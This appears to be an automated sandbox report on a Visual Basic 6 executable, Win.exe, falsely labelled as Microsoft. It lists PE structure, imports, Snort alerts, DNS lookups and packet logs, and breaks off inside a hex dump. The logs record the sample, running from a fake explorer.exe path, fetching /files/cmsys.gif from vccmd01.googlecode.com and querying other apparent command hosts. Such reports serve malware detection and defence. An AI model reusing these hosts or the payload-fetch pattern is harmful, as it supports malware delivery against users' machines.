add byte ptr [eax], al
add byte ptr [ebp+45h], dh
js 00007F6704D66B19h
popad
je 00007F6704D66B25h
push 0040C100h
fadd st(0), st(0)
inc eax
add bl, bl
scasb
dec ecx
test dword ptr [ecx+ebx-3F56B459h], eax
mov bl, 8Fh
xor eax, 70C5231Dh
rol byte ptr [edi+edx*8-12h], cl
salc
dec edx
mov ah, 13h
in eax, dx
fsub qword ptr [edi]
push 31CCFF3Ch

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x2ac84	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x2e000	0x5e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0x284	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x2a728	0x2b000	False	0.368067541788	data	5.94719743825	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.data	0x2c000	0x1b74	0x1000	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rsrc	0x2e000	0x5e0	0x1000	False	0.118408203125	data	1.69293554827	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_ICON	0x2e2f8	0xcd0	dBase IV DBT of @.DBF, block length 3072, next free block index 40, next free block 0, next used block 0
RT_GROUP_ICON	0x2e2e4	0x14	data
RT_VERSION	0x2e0f0	0x1f4	data	English	United States

Imports

DLL

Import

MSVBVM60.DLL

EVENT_SINK_GetIDsOfNames, __vbaStrI2, _CIcos, _adj_fptan, __vbaStrI4, __vbaVarVargNofree, __vbaFreeVar, __vbaStrVarMove, __vbaLenBstr, __vbaLateIdCall, __vbaPut3, __vbaEnd, __vbaFreeVarList, _adj_fdiv_m64, __vbaPut4, EVENT_SINK_Invoke, __vbaRaiseEvent, __vbaFreeObjList, __vbaStrErrVarCopy, _adj_fprem1, __vbaRecAnsiToUni, __vbaCopyBytes, __vbaStrCat, __vbaLsetFixstr, __vbaRecDestruct, __vbaSetSystemError, __vbaHresultCheckObj, __vbaNameFile, _adj_fdiv_m32, __vbaAryVar, Zombie_GetTypeInfo, __vbaAryDestruct, __vbaBoolStr, __vbaExitProc, __vbaI4Abs, __vbaOnError, __vbaObjSet, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, __vbaFpR4, __vbaStrFixstr, _CIsin, __vbaErase, __vbaChkstk, __vbaFileClose, EVENT_SINK_AddRef, __vbaGenerateBoundsError, __vbaGet3, __vbaStrCmp, __vbaGet4, __vbaPutOwner3, __vbaVarTstEq, __vbaAryConstruct2, __vbaObjVar, __vbaI2I4, DllFunctionCall, __vbaVarLateMemSt, __vbaFpUI1, __vbaRedimPreserve, __vbaStrR4, _adj_fpatan, __vbaFixstrConstruct, __vbaLateIdCallLd, Zombie_GetTypeInfoCount, __vbaRedim, __vbaRecUniToAnsi, EVENT_SINK_Release, __vbaNew, __vbaUI1I2, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, __vbaStrToUnicode, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaGetOwner3, __vbaUbound, __vbaFileSeek, _CIlog, __vbaErrorOverflow, __vbaFileOpen, __vbaVarLateMemCallLdRf, __vbaNew2, __vbaInStr, _adj_fdiv_m32i, _adj_fdivr_m32i, __vbaStrCopy, __vbaI4Str, __vbaFreeStrList, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarSetVar, __vbaI4Var, __vbaLateMemCall, __vbaVarAdd, __vbaAryLock, __vbaStrComp, __vbaVarDup, __vbaStrToAnsi, __vbaFpI2, __vbaFpI4, __vbaVarLateMemCallLd, __vbaVarSetObjAddref, __vbaRecDestructAnsi, __vbaLateMemCallLd, _CIatan, __vbaAryCopy, __vbaStrMove, __vbaCastObj, __vbaR8IntI4, _allmul, __vbaVarLateMemCallSt, _CItan, __vbaAryUnlock, _CIexp, __vbaFreeObj, __vbaFreeStr

Version Infos

Description	Data
Translation	0x0409 0x04b0
InternalName	Win
FileVersion	1.00
CompanyName	Microsoft
ProductName	Win
ProductVersion	1.00
OriginalFilename	Win.exe

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
04/12/21-08:59:36.631669	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.5	8.8.8.8
04/12/21-09:00:36.691220	TCP	1201	ATTACK-RESPONSES 403 Forbidden	80	49737	35.186.238.101	192.168.2.5

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 08:59:22.248967886 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.296555996 CEST	80	49708	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:22.296710968 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.299846888 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.347373962 CEST	80	49708	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:22.347405910 CEST	80	49708	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:22.347419977 CEST	80	49708	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:22.347517014 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.347537994 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.357697010 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:22.357743025 CEST	49708	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.306448936 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.354082108 CEST	80	49709	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:24.354226112 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.355314016 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.402867079 CEST	80	49709	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:24.402906895 CEST	80	49709	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:24.402926922 CEST	80	49709	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:24.403969049 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.404000998 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:24.404179096 CEST	49709	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.518670082 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.566207886 CEST	80	49711	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:26.566296101 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.571388006 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.618876934 CEST	80	49711	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:26.618937969 CEST	80	49711	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:26.618971109 CEST	80	49711	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:26.619036913 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.631679058 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:26.631720066 CEST	49711	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:33.842767000 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:33.890408039 CEST	80	49712	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:33.891410112 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:33.931504011 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:33.979028940 CEST	80	49712	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:33.979254007 CEST	80	49712	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:33.979278088 CEST	80	49712	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:33.979353905 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:33.979387999 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:34.051060915 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:34.072849035 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:34.098625898 CEST	80	49712	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:34.099121094 CEST	49712	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.700047970 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.747490883 CEST	80	49718	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:37.747678995 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.755568027 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.802690029 CEST	80	49718	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:37.802733898 CEST	80	49718	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:37.802764893 CEST	80	49718	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:37.802890062 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.802947998 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.819402933 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.819458008 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:37.868227005 CEST	80	49718	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:37.868318081 CEST	49718	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.160196066 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.207783937 CEST	80	49721	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:39.210468054 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.211385012 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.258974075 CEST	80	49721	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:39.259001017 CEST	80	49721	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:39.259017944 CEST	80	49721	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:39.259116888 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.259154081 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.298732996 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.302324057 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.346318007 CEST	80	49721	74.125.143.82	192.168.2.5
Apr 12, 2021 08:59:39.346431017 CEST	49721	80	192.168.2.5	74.125.143.82
Apr 12, 2021 08:59:39.477844954 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.675530910 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.675661087 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.732798100 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.906733036 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.906955957 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.907671928 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.907769918 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.907972097 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908034086 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.908176899 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908237934 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908266068 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908298016 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908322096 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908338070 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.908343077 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.908368111 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.908402920 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.908412933 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:39.913697958 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.916807890 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:39.916964054 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:40.155013084 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:40.328388929 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:40.328422070 CEST	443	49722	103.67.236.191	192.168.2.5
Apr 12, 2021 08:59:40.328530073 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:40.328556061 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:40.360382080 CEST	49722	443	192.168.2.5	103.67.236.191
Apr 12, 2021 08:59:40.536022902 CEST	443	49722	103.67.236.191	192.168.2.5

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 12, 2021 08:58:50.314032078 CEST	52212	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:50.362715006 CEST	53	52212	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:50.893511057 CEST	54302	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:50.961889982 CEST	53	54302	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:51.090080023 CEST	53784	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:51.147371054 CEST	53	53784	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:51.589947939 CEST	65307	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:51.629468918 CEST	64344	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:51.638689995 CEST	53	65307	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:51.686783075 CEST	53	64344	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:52.098087072 CEST	62060	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:52.146862030 CEST	53	62060	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:53.741008997 CEST	61805	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:53.792774916 CEST	53	61805	8.8.8.8	192.168.2.5
Apr 12, 2021 08:58:55.334372044 CEST	54795	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:58:55.393574953 CEST	53	54795	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:03.767064095 CEST	49557	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:03.815931082 CEST	53	49557	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:05.469460011 CEST	61733	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:05.529182911 CEST	53	61733	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:21.046060085 CEST	65447	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:21.107579947 CEST	53	65447	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:22.162947893 CEST	52441	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:22.231017113 CEST	53	52441	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:24.231899023 CEST	62176	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:24.299663067 CEST	53	62176	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:26.372454882 CEST	59596	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:26.421117067 CEST	53	59596	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:26.448827982 CEST	65296	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:26.503456116 CEST	51058	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:26.504220963 CEST	59736	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:26.509223938 CEST	52636	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:26.516956091 CEST	53	65296	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:26.553005934 CEST	53	59736	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:26.554830074 CEST	53	51058	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:26.558855057 CEST	53	52636	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:29.260740042 CEST	63183	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:29.399589062 CEST	53	63183	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:31.241071939 CEST	60151	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:31.302438974 CEST	53	60151	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:36.582768917 CEST	59736	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:36.631503105 CEST	53	59736	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:37.297923088 CEST	56969	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:37.351946115 CEST	53	56969	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:37.670579910 CEST	55161	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:37.720278978 CEST	53	55161	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:38.157154083 CEST	54757	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:38.219662905 CEST	53	54757	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:39.039206028 CEST	49992	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:39.448544979 CEST	53	49992	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:40.678463936 CEST	60075	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:40.738491058 CEST	53	60075	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:42.121853113 CEST	55016	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:42.182570934 CEST	53	55016	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:44.520339966 CEST	64345	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:44.569757938 CEST	53	64345	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:48.627911091 CEST	57128	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:48.766318083 CEST	53	57128	8.8.8.8	192.168.2.5
Apr 12, 2021 08:59:59.662884951 CEST	54791	53	192.168.2.5	8.8.8.8
Apr 12, 2021 08:59:59.711622953 CEST	53	54791	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:00.016756058 CEST	50463	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:00.076745987 CEST	53	50463	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:00.908576012 CEST	50394	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:00.957552910 CEST	53	50394	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:01.728390932 CEST	58530	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:01.785993099 CEST	53	58530	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:02.067718029 CEST	53813	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:02.116422892 CEST	53	53813	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:04.557579041 CEST	63732	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:04.606408119 CEST	53	63732	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:14.121506929 CEST	57344	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:14.173024893 CEST	53	57344	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:15.761663914 CEST	54450	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:15.810347080 CEST	53	54450	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:36.364495039 CEST	59261	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:36.453035116 CEST	53	59261	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:38.007709980 CEST	57151	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:38.056330919 CEST	53	57151	8.8.8.8	192.168.2.5
Apr 12, 2021 09:00:57.032413960 CEST	59413	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:00:57.112343073 CEST	53	59413	8.8.8.8	192.168.2.5
Apr 12, 2021 09:01:02.672296047 CEST	60516	53	192.168.2.5	8.8.8.8
Apr 12, 2021 09:01:02.739871025 CEST	53	60516	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Apr 12, 2021 08:59:36.631669044 CEST	192.168.2.5	8.8.8.8	d060	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Apr 12, 2021 08:59:22.162947893 CEST	192.168.2.5	8.8.8.8	0x4b34	Standard query (0)	vccmd01.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:24.231899023 CEST	192.168.2.5	8.8.8.8	0xf0ef	Standard query (0)	vccmd02.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:26.448827982 CEST	192.168.2.5	8.8.8.8	0xf02	Standard query (0)	vccmd03.googlecode.com	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:29.260740042 CEST	192.168.2.5	8.8.8.8	0x6d74	Standard query (0)	vccmd01.t35.com	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:31.241071939 CEST	192.168.2.5	8.8.8.8	0x16d6	Standard query (0)	vccmd01.zxq.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:39.039206028 CEST	192.168.2.5	8.8.8.8	0xca9e	Standard query (0)	demo.sdssoftltd.co.uk	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:40.678463936 CEST	192.168.2.5	8.8.8.8	0x37a6	Standard query (0)	vccmd01.t35.com	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:42.121853113 CEST	192.168.2.5	8.8.8.8	0x9f1b	Standard query (0)	vccmd01.zxq.net	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:48.627911091 CEST	192.168.2.5	8.8.8.8	0x5c68	Standard query (0)	vccmd01.t35.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:00:36.364495039 CEST	192.168.2.5	8.8.8.8	0xb156	Standard query (0)	www.postphenomenon.com	A (IP address)	IN (0x0001)
Apr 12, 2021 09:00:57.032413960 CEST	192.168.2.5	8.8.8.8	0x39ed	Standard query (0)	www.slymwhite.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Apr 12, 2021 08:59:22.231017113 CEST	8.8.8.8	192.168.2.5	0x4b34	No error (0)	vccmd01.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 08:59:22.231017113 CEST	8.8.8.8	192.168.2.5	0x4b34	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:24.299663067 CEST	8.8.8.8	192.168.2.5	0xf0ef	No error (0)	vccmd02.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 08:59:24.299663067 CEST	8.8.8.8	192.168.2.5	0xf0ef	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:26.516956091 CEST	8.8.8.8	192.168.2.5	0xf02	No error (0)	vccmd03.googlecode.com	googlecode.l.googleusercontent.com		CNAME (Canonical name)	IN (0x0001)
Apr 12, 2021 08:59:26.516956091 CEST	8.8.8.8	192.168.2.5	0xf02	No error (0)	googlecode.l.googleusercontent.com		74.125.143.82	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:29.399589062 CEST	8.8.8.8	192.168.2.5	0x6d74	Name error (3)	vccmd01.t35.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:31.302438974 CEST	8.8.8.8	192.168.2.5	0x16d6	Name error (3)	vccmd01.zxq.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:39.448544979 CEST	8.8.8.8	192.168.2.5	0xca9e	No error (0)	demo.sdssoftltd.co.uk		103.67.236.191	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:40.738491058 CEST	8.8.8.8	192.168.2.5	0x37a6	Name error (3)	vccmd01.t35.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:42.182570934 CEST	8.8.8.8	192.168.2.5	0x9f1b	Name error (3)	vccmd01.zxq.net	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 08:59:48.766318083 CEST	8.8.8.8	192.168.2.5	0x5c68	Name error (3)	vccmd01.t35.com	none	none	A (IP address)	IN (0x0001)
Apr 12, 2021 09:00:36.453035116 CEST	8.8.8.8	192.168.2.5	0xb156	No error (0)	www.postphenomenon.com		35.186.238.101	A (IP address)	IN (0x0001)
Apr 12, 2021 09:00:57.112343073 CEST	8.8.8.8	192.168.2.5	0x39ed	Name error (3)	www.slymwhite.com	none	none	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

vccmd01.googlecode.com

vccmd02.googlecode.com

vccmd03.googlecode.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.5	49708	74.125.143.82	80	C:\Windows\System\explorer.exe

Timestamp	kBytes transferred	Direction	Data
Apr 12, 2021 08:59:22.299846888 CEST	904	OUT	GET /files/cmsys.gif HTTP/1.1 Accept: / Accept-Encoding: gzip, deflate User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko Host: vccmd01.googlecode.com Connection: Keep-Alive
Apr 12, 2021 08:59:22.347405910 CEST	906	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=UTF-8 Referrer-Policy: no-referrer Content-Length: 1576 Date: Mon, 12 Apr 2021 06:59:22 GMT Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 